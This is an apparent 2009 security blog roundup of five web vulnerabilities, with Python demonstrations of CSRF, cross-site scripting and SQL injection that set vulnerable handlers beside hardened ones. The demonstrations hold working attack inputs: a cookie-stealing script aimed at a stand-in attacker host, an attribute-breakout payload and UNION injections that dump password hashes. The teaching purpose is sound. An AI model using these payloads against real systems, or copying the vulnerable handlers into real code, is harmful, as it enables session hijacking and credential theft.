Top Web Vulnerabilities

Top Five Web Application Vulnerabilities 1/05/09 - 1/19/09

1) Cisco IOS HTTP Server Multiple Cross-Site Scripting Vulnerabilities

The Cisco IOS HTTP server is susceptible to multiple cross-site scripting vulnerabilities. They can be exploited to execute arbitrary script code in the browser of an unsuspecting user, in the context of the device's web interface, and to steal cookie-based authentication credentials. Patches that address these issues have been released. Contact the vendor for additional information.

http://www.securityfocus.com/bid/33260

2) Cisco IronPort Encryption Appliance and PostX Multiple Remote Vulnerabilities

Cisco IronPort Encryption Appliance and PostX are susceptible to multiple remote vulnerabilities, including information disclosure and cross-site request forgery. An attacker could leverage these issues to steal passwords or to modify user information through the web administration interface, using the privileges of an administrator whose browser is lured to an attacker-controlled page. Updates that resolve these issues are available. Contact the vendor for further details.

http://www.securityfocus.com/bid/33268/
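The CSRF case above turns on one fact: the browser attaches the victim's session cookie to any POST, including one an attacker's page submits. The following is an added illustration, not code from Cisco or from the appliance: a password-change handler that trusts the cookie alone, beside the same handler with an Origin check and a per-session synchronizer token. The server secret, the admin-UI origin, the Request type and the session id are all constructed for the example.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Hypothetical server-side secret and admin-UI origin (constructed for this
# example; a real deployment generates the secret at install time).
SERVER_SECRET = b"constructed-example-secret-do-not-reuse"
APP_ORIGIN = "https://admin.example.test"


@dataclass
class Request:
    """Minimal stand-in for a POST as the admin interface sees it."""
    session_id: str   # session cookie value, sent by the browser automatically
    headers: dict     # request headers of interest (Origin / Referer)
    form: dict        # POST body fields


def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC-SHA256(secret, session id).
    Stateless, so the server stores nothing extra. An attacker's page cannot
    compute it without the secret and cannot read it out of the victim's page
    because of the same-origin policy."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_password_vulnerable(req: Request, users: dict) -> bool:
    """Trusts the cookie alone: any site that makes the victim's browser POST
    here gets the change applied with the victim's privileges."""
    user = users.get(req.session_id)
    if user is None:
        return False
    user["password"] = req.form["new_password"]
    return True


def change_password_hardened(req: Request, users: dict) -> bool:
    """Same action; a cross-site POST is rejected by two independent checks."""
    user = users.get(req.session_id)
    if user is None:
        return False
    # 1) Origin (fallback Referer) must be the admin UI itself. Browsers set
    #    Origin on cross-site POSTs and page scripts cannot override it. The
    #    exact-match-or-prefix-with-slash test blocks look-alike hosts such as
    #    admin.example.test.attacker.example; an absent header fails closed.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith(APP_ORIGIN + "/") and origin != APP_ORIGIN:
        return False
    # 2) The form must carry the token issued for this session (constant-time
    #    comparison so the check itself does not leak the token).
    presented = req.form.get("csrf_token", "")
    if not hmac.compare_digest(presented, csrf_token(req.session_id)):
        return False
    user["password"] = req.form["new_password"]
    return True


def run_demo() -> dict:
    """Replays one forged and one legitimate request against both handlers.
    Returns {label: (change_applied, resulting_password)}."""
    sid = "sess-1234"   # constructed session cookie value
    forged = Request(sid, {"Origin": "https://attacker.example.test"},
                     {"new_password": "pwned"})
    legit = Request(sid, {"Origin": APP_ORIGIN},
                    {"new_password": "rotated", "csrf_token": csrf_token(sid)})
    out = {}
    for label, handler in (("vulnerable", change_password_vulnerable),
                           ("hardened", change_password_hardened)):
        for kind, req in (("forged", forged), ("legit", legit)):
            users = {sid: {"name": "alice", "password": "original"}}
            applied = handler(req, users)
            out[f"{label}/{kind}"] = (applied, users[sid]["password"])
    return out


if __name__ == "__main__":
    for key, (applied, password) in run_demo().items():
        print(f"{key:20s} applied={applied!s:5s} password={password}")
```

Against the vulnerable handler the forged request resets the password; against the hardened one it is refused while the legitimate request still succeeds. Either check alone would stop this particular forgery; keeping both means a single misconfiguration (a stripped Origin header, a token accidentally exposed in a URL) does not reopen the hole.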

3) XOOPS 'mydirname' Parameter Multiple PHP Code Injection Vulnerabilities

XOOPS is susceptible to multiple PHP code injection vulnerabilities in its handling of the 'mydirname' parameter, which allow an attacker to inject and execute arbitrary PHP code in the context of the web server process. Successful exploitation could lead to a compromise of the application and the underlying system. Fixes have not yet been released. Contact the vendor for more details.

http://www.securityfocus.com/bid/33176

4) Interstage HTTP Server mod_proxy_ftp Cross-Site Scripting

Interstage HTTP Server is susceptible to a cross-site scripting vulnerability in its mod_proxy_ftp module; only deployments that load that module are exposed. An attacker can leverage this issue to execute script code in the browsers of unsuspecting users in the context of the affected application, possibly leading to theft of authentication credentials and other attacks. An advisory that addresses this issue has been released. Contact the vendor for more information.

http://secunia.com/advisories/33428/
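Two of this week's entries (the Cisco IOS HTTP server and Interstage mod_proxy_ftp) are cross-site scripting, and both summaries point at the same consequence: script running in the user's browser and reading the session cookie. The following is an added illustration, not code from either vendor. It reflects a request parameter into an HTML element body and into an attribute value, once unescaped and once escaped, parses the result the way a browser would to show what the attacker's input created, and builds the session cookie with the HttpOnly flag that keeps it out of document.cookie even when a script does run. The payloads, the page template and the cookie name are constructed for the example.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed probe inputs of the kind sent when testing for reflected XSS:
# one aimed at an element body, one that breaks out of an attribute value.
PAYLOAD_BODY = ('<script>new Image().src="https://attacker.example.test/?c="'
                '+document.cookie</script>')
PAYLOAD_ATTR = '" autofocus onfocus="alert(document.cookie)'


def render_vulnerable(query: str) -> str:
    """Reflects the request parameter unchanged into two HTML contexts."""
    return (f"<p>Results for: {query}</p>\n"
            f'<input name="q" value="{query}">')


def render_hardened(query: str) -> str:
    """Same page; the untrusted value is escaped for HTML text and, with
    quote=True, also for a double-quoted attribute value."""
    safe = html.escape(query, quote=True)
    return (f"<p>Results for: {safe}</p>\n"
            f'<input name="q" value="{safe}">')


class ActiveContentFinder(HTMLParser):
    """Records script elements and on* event-handler attributes, i.e. the
    things a reflected parameter must never be able to create."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")


def active_content(page: str) -> list:
    """Parses the page as a browser would and lists injected active content."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


def session_cookie(value: str) -> str:
    """Set-Cookie value for the session: HttpOnly keeps it out of
    document.cookie even if a script does run; Secure keeps it off cleartext."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        for payload in (PAYLOAD_BODY, PAYLOAD_ATTR):
            print(f"{label:10s} {active_content(render(payload))}")
    print(session_cookie("abc123"))
```

The attribute payload is the reason escaping has to match the context: it contains no angle brackets at all, so a filter that only strips tags would pass it, yet in the unescaped page it closes the value attribute and adds an onfocus handler. Quote-escaping keeps the whole input inside the attribute value, and the parser then reports nothing for either payload. HttpOnly does not prevent the script from running, but it removes the cookie theft the advisories describe as the payoff.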

5) WordPress Plugin WP-Forum 'forum_feed.php' SQL Injection Vulnerability

The WordPress plugin WP-Forum is susceptible to a SQL injection vulnerability in 'forum_feed.php'. SQL injection can give an attacker read and write access to the backend database, including tables the application never exposes, and in certain circumstances (for example, where the database account can write files or run operating-system commands) can be leveraged to take complete control of the system. A fix has not yet been released. Contact the vendor for further details.

http://www.securityfocus.com/bid/33223
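The entry above describes the class but not the mechanics, so the following is an added illustration rather than the plugin's code: a forum-feed query that pastes a numeric forum id from the request into the statement, beside the same query with the id type-checked and bound as a parameter, run against an in-memory SQLite database. The schema is constructed for the example (the users table borrows the WordPress column names user_login and user_pass, but the rows and the forum table are made up), and both attacker inputs are constructed too.

```python
import sqlite3

# In-memory stand-in for the blog database. Column names on the users table
# are modelled on WordPress; the forum table and every row are constructed.
SCHEMA = """
CREATE TABLE forum_posts (id INTEGER PRIMARY KEY, forum_id INTEGER,
                          subject TEXT, body TEXT);
CREATE TABLE users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO forum_posts VALUES (1, 1, 'Welcome', 'First post');
INSERT INTO forum_posts VALUES (2, 2, 'Private', 'Members only');
INSERT INTO users VALUES (1, 'admin', '$P$Bconstructed.hash.value');
"""

# Constructed attacker inputs for a numeric forum-id parameter: the first
# widens the WHERE clause to every forum, the second appends a UNION that
# pulls rows from an unrelated table and comments out the rest of the query.
TAMPER_ALL_FORUMS = "1 OR 1=1"
DUMP_USERS = "0 UNION SELECT user_login, user_pass FROM users -- "


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def feed_vulnerable(con: sqlite3.Connection, forum_id: str) -> list:
    """The request parameter is pasted into the statement, so whatever it
    contains is parsed as SQL rather than as a number."""
    sql = ("SELECT subject, body FROM forum_posts "
           f"WHERE forum_id = {forum_id} ORDER BY id DESC")
    return con.execute(sql).fetchall()


def feed_hardened(con: sqlite3.Connection, forum_id: str) -> list:
    """Two independent fixes: the value must parse as an integer (otherwise
    the request is rejected) and it is bound as a parameter, so the database
    never sees it as SQL text even if the type check were removed."""
    try:
        fid = int(forum_id)
    except ValueError:
        return []
    sql = ("SELECT subject, body FROM forum_posts "
           "WHERE forum_id = ? ORDER BY id DESC")
    return con.execute(sql, (fid,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    for label, feed in (("vulnerable", feed_vulnerable),
                        ("hardened", feed_hardened)):
        for arg in ("2", TAMPER_ALL_FORUMS, DUMP_USERS):
            print(f"{label:10s} forum_id={arg!r:55s} -> {feed(db, arg)}")
```

With the vulnerable query, "1 OR 1=1" returns posts from every forum and the UNION input returns the admin login and password hash from a table the feed never queries, which is the "full access to a backend database" the summary warns about. The hardened query returns the same single row for a legitimate id and nothing for either attack. In a WordPress plugin the equivalent of the parameter binding is passing the value through $wpdb->prepare() instead of interpolating it into the query string.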


Posted 01-20-2009 8:57 PM by mark.painter